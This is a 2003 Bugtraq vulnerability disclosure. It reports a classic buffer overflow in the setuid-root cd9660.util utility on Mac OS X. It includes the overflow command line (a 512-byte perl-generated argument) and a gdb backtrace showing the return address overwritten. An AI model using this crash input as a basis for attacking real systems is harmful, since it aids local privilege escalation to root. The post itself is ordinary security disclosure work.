[32852] in bugtraq
Buffer overflow/privilege escalation in MacOS X
daemon@ATHENA.MIT.EDU (Max)
Mon Dec 15 16:45:25 2003
Date: Mon, 15 Dec 2003 11:54:02 -0800
From: Max <rusmir@tula.net>
To: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.58.0312151132450.13512@fsj.fqfubzr.arg>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Hi,
It appears that parts of MacOSX that didn't come from BSD are
not very well written and have significant security issues.
An example is a /System/Library/Filesystems/cd9660.fs/cd9660.util
utility. It is suid root and it is vulnerable to a classic buffer
overflow due to the lack of input validation.
Demonstration:
sdsx:/System/Library/Filesystems/cd9660.fs max$ ls -la cd9660.util
-rwsr-xr-x 1 root wheel 20476 23 Sep 23:53 cd9660.util
sdsx:/System/Library/Filesystems/cd9660.fs max$ ./cd9660.util -p `perl -e "print 'A'x512"`
Segmentation fault
sdsx:/System/Library/Filesystems/cd9660.fs root# gdb -core /cores/core.1405 ./cd9660.util
[gdb banner here]
Reading symbols for shared libraries .... done
Core was generated by `./cd9660.util'.
#0 0x9000d360 in strcat ()
(gdb) where
#0 0x9000d360 in strcat ()
#1 0x00002b84 in main ()
#2 0x41414141 in ?? ()
Thanks,
Max.
